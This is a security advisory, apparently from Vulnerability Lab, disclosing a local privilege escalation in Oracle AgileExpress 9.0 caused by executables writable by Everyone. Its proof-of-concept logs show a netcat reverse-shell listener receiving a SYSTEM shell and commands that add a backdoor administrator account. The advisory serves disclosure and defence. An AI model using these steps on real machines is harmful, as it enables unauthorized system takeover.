Vulners
Lucene search
Oracle AgileExpress v9.0 - Privilege Escalation Vulnerability
🗓️ 16 Jan 2018 00:00:00Reported by S.AbenMassaoud [[email protected]] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoudType 
vulnerlab🔗 www.vulnerability-lab.com👁 34 Views
Document Title:
===============
Oracle AgileExpress v9.0 - Privilege Escalation Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2114
Release Date:
=============
2018-01-16
Vulnerability Laboratory ID (VL-ID):
====================================
2114
Common Vulnerability Scoring System:
====================================
4.2
Vulnerability Class:
====================
Privilege Escalation
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Agile eXpress allows Agile users to create a PDX package containing product definition data and publish it to their partners.
Interested parties can then view the data using Agile eXpress even if they don't have access to the Agile server. The Agile Web
Client allows you to import product data created on another system or another Agile system into your Agile system. Using Agile
eXpress and the Agile Web Client, customers and partners can exchange all product information required to build a new product
or change an existing product.
(Copy of the Homepage: http://agile-express.software.informer.com/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local privilege escalation vulnerability in the Oracle AgileExpress 9.0 software.
Vulnerability Disclosure Timeline:
==================================
2017-11-02: Researcher Notification & Coordination (SaifAllah benMassaoud)
2017-11-03: Vendor Notification (Oracle Security Alerts)
2017-11-29: Vendor Response/Feedback (Oracle Security Alerts)
2017-12-04: Vendor Response/Feedback (Oracle Security Alerts - Remove of Software)
2017-12-04: Vendor Response/Feedback (Security Acknowledgement) (Oracle Security Alerts - Security-In-Depth Contributors)
2018-01-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A local path privilege escalation vulnerability has been discovered in the official Oracle AgileExpress 9.0 software.
The local security vulnerability allows an attackers to gain higher access privileges by exploitation of the weak
software files permissions misconfiguration.
The software suffers from a local privilege escalation vulnerability. Users are able to change the files with executable access
to a binary of choice. The issue is located in the misconfigured permission values with the `F`(full) flag in the users and the
everyone group. The group/user permission for the path is assigned to the everyone group. Local attackers could exploit the
vulnerability by replace files with a malicious executable file. The malicious file is exectuable with the local system user
permissions by misconfiguration.
The security risk of the vulnerability is estimated as medium. Exploitation of the software vulnerability requires a low privilege
system user account with restricted access and without user interaction. Successful exploitation of the vulnerability results in
system process compromise and further manipulation or exploitation to compromise the local computer operating system.
Proof of Concept (PoC):
=======================
The local privilege escalation vulnerability can be exploited by local attackers without user interaction and with system user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
--- Session Logs (PRIVILEGES) ---
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
FILE_ALL_ACCESS <-----------------------------
RW BUILTINAdministrators
READ_CONTROL
WRITE_DAC
Owner : BUILTINAdministrators
Group : MACHINE-PCNone
Access : Everyone Allow FullControl <-----------------------------
Sddl : O:BAG:S-1-5-21-3389066293-2711879841-802680780-513D:AI(A;OICIID;FA;WD)
--- Session Logs (AGILEEXPRESS / PERMISSIONS) ---
[+] AgileExpress.exe ======> Everyone:(I)(F)
Path Owner Access
---- ----- ------
AgileExpress.exe BUILTINAdministrators Everyone Allow FullControl
--- Session Logs (UNINSTALL / PERMISSIONS) ---
[+] Uninstall Agile eXpress.exe ======> Everyone:(I)(F)
--- Session Logs (RESOURCE / PERMISSIONS) ---
[+] remove.exe ======> Everyone:(I)(F)
[+] ZGWin32LaunchHelper.exe ======> Everyone:(I)(F)
--- Session Logs (JREBIN / PERMISSIONS) ---
[+] appletviewer.exe ======> Everyone:(I)(F)
[+] apt.exe ======> Everyone:(I)(F)
[+] extcheck.exe ======> Everyone:(I)(F)
[+] idlj.exe ======> Everyone:(I)(F)
[+] jabswitch.exe ======> Everyone:(I)(F)
[+] jar.exe ======> Everyone:(I)(F)
[+] jarsigner.exe ======> Everyone:(I)(F)
[+] java-rmi.exe ======> Everyone:(I)(F)
[+] java.exe ======> Everyone:(I)(F)
[+] javac.exe ======> Everyone:(I)(F)
[+] javadoc.exe ======> Everyone:(I)(F)
[+] javafxpackager.exe ======> Everyone:(I)(F)
[+] javah.exe ======> Everyone:(I)(F)
[+] javap.exe ======> Everyone:(I)(F)
[+] javaw.exe ======> Everyone:(I)(F)
[+] javaws.exe ======> Everyone:(I)(F)
[+] jcmd.exe ======> Everyone:(I)(F)
[+] jconsole.exe ======> Everyone:(I)(F)
[+] jdb.exe ======> Everyone:(I)(F)
[+] jhat.exe ======> Everyone:(I)(F)
[+] jinfo.exe ======> Everyone:(I)(F)
[+] jmap.exe ======> Everyone:(I)(F)
[+] jps.exe ======> Everyone:(I)(F)
[+] jrunscript.exe ======> Everyone:(I)(F)
[+] jsadebugd.exe ======> Everyone:(I)(F)
[+] jstack.exe ======> Everyone:(I)(F)
[+] jstat.exe ======> Everyone:(I)(F)
[+] jstatd.exe ======> Everyone:(I)(F)
[+] jvisualvm.exe ======> Everyone:(I)(F)
[+] keytool.exe ======> Everyone:(I)(F)
[+] kinit.exe ======> Everyone:(I)(F)
[+] klist.exe ======> Everyone:(I)(F)
[+] ktab.exe ======> Everyone:(I)(F)
[+] native2ascii.exe ======> Everyone:(I)(F)
[+] orbd.exe ======> Everyone:(I)(F)
[+] pack200.exe ======> Everyone:(I)(F)
[+] packager.exe ======> Everyone:(I)(F)
[+] policytool.exe ======> Everyone:(I)(F)
[+] rmic.exe ======> Everyone:(I)(F)
[+] rmid.exe ======> Everyone:(I)(F)
[+] rmiregistry.exe ======> Everyone:(I)(F)
[+] schemagen.exe ======> Everyone:(I)(F)
[+] serialver.exe ======> Everyone:(I)(F)
[+] servertool.exe ======> Everyone:(I)(F)
[+] tnameserv.exe ======> Everyone:(I)(F)
[+] unpack200.exe ======> Everyone:(I)(F)
[+] wsgen.exe ======> Everyone:(I)(F)
[+] wsimport.exe Everyone:(I)(F)
[+] xjc.exe ======> Everyone:(I)(F)
Path Owner Access
---- ----- ------
appletviewer.exe BUILTINAdministrators Everyone Allow FullControl
apt.exe BUILTINAdministrators Everyone Allow FullControl
extcheck.exe BUILTINAdministrators Everyone Allow FullControl
idlj.exe BUILTINAdministrators Everyone Allow FullControl
jabswitch.exe BUILTINAdministrators Everyone Allow FullControl
jar.exe BUILTINAdministrators Everyone Allow FullControl
jarsigner.exe BUILTINAdministrators Everyone Allow FullControl
java-rmi.exe BUILTINAdministrators Everyone Allow FullControl
java.exe BUILTINAdministrators Everyone Allow FullControl
javac.exe BUILTINAdministrators Everyone Allow FullControl
javadoc.exe BUILTINAdministrators Everyone Allow FullControl
javafxpackager.exe BUILTINAdministrators Everyone Allow FullControl
javah.exe BUILTINAdministrators Everyone Allow FullControl
javap.exe BUILTINAdministrators Everyone Allow FullControl
javaw.exe BUILTINAdministrators Everyone Allow FullControl
javaws.exe BUILTINAdministrators Everyone Allow FullControl
jcmd.exe BUILTINAdministrators Everyone Allow FullControl
jconsole.exe BUILTINAdministrators Everyone Allow FullControl
jdb.exe BUILTINAdministrators Everyone Allow FullControl
jhat.exe BUILTINAdministrators Everyone Allow FullControl
jinfo.exe BUILTINAdministrators Everyone Allow FullControl
jmap.exe BUILTINAdministrators Everyone Allow FullControl
jps.exe BUILTINAdministrators Everyone Allow FullControl
jrunscript.exe BUILTINAdministrators Everyone Allow FullControl
jsadebugd.exe BUILTINAdministrators Everyone Allow FullControl
jstack.exe BUILTINAdministrators Everyone Allow FullControl
jstat.exe BUILTINAdministrators Everyone Allow FullControl
jstatd.exe BUILTINAdministrators Everyone Allow FullControl
jvisualvm.exe BUILTINAdministrators Everyone Allow FullControl
keytool.exe BUILTINAdministrators Everyone Allow FullControl
kinit.exe BUILTINAdministrators Everyone Allow FullControl
klist.exe BUILTINAdministrators Everyone Allow FullControl
ktab.exe BUILTINAdministrators Everyone Allow FullControl
native2ascii.exe BUILTINAdministrators Everyone Allow FullControl
orbd.exe BUILTINAdministrators Everyone Allow FullControl
pack200.exe BUILTINAdministrators Everyone Allow FullControl
packager.exe BUILTINAdministrators Everyone Allow FullControl
policytool.exe BUILTINAdministrators Everyone Allow FullControl
rmic.exe BUILTINAdministrators Everyone Allow FullControl
rmid.exe BUILTINAdministrators Everyone Allow FullControl
rmiregistry.exe BUILTINAdministrators Everyone Allow FullControl
schemagen.exe BUILTINAdministrators Everyone Allow FullControl
serialver.exe BUILTINAdministrators Everyone Allow FullControl
servertool.exe BUILTINAdministrators Everyone Allow FullControl
tnameserv.exe BUILTINAdministrators Everyone Allow FullControl
unpack200.exe BUILTINAdministrators Everyone Allow FullControl
wsgen.exe BUILTINAdministrators Everyone Allow FullControl
wsimport.exe BUILTINAdministrators Everyone Allow FullControl
xjc.exe BUILTINAdministrators Everyone Allow FullControl
--------- ( NET USER SAIF ) ---------
User name saif
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
--------- ( NET LOCALGROUP ADMINISTRATORS ) ---------
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
dell < ------------
The command completed successfully.
- WHOAMI ====> MACHINE-PCsaif
c:UsersSaifDesktopNcnc.exe -lvp 4433
Listening on [any] 4433 ...
Connect to [ 192.168............ ] from [ 192.168............ ] 49500
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:WindowsSystem32>whoami
whoami
NT AUTHORITYSYSTEM < ------------
C:WindowsSystem32>net user /add test test
The command completed successfully.
C:WindowsSystem32>net localgroup administrators /add test test
The command completed successfully.
C:WindowsSystem32>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
dell
test < ------------
The command completed successfully.
--------- ( NET USER TEST ) ---------
User name test
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
- NOTE : Simple User can Manage Another [administrators - Users] Accounts :
[+] Change Accounts Names
[+] Change Passwords
[+] Remove Passwords
[+] Set up Parental Controls
[+] Change Accounts Types
[+] Delete Accounts
Solution - Fix & Patch:
=======================
Oracle inadvertently listed this software on Oracle Technology Network and they remove the software and documentation from their download site:
Link : http://www.oracle.com/technetwork/apps-tech/index-097651.html
Link : http://www.oracle.com/technetwork/agileexpress-license-152008.html
Security Risk:
==============
The security risk of the local privilege escalation vulnerability in Oracle AgileExpress v9.0 software is estimated as medium (cvss 4.2).
Credits & Authors:
==================
S.AbenMassaoud [[email protected]] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jan 2018 00:00Current
0.9Low risk
Vulners AI Score0.9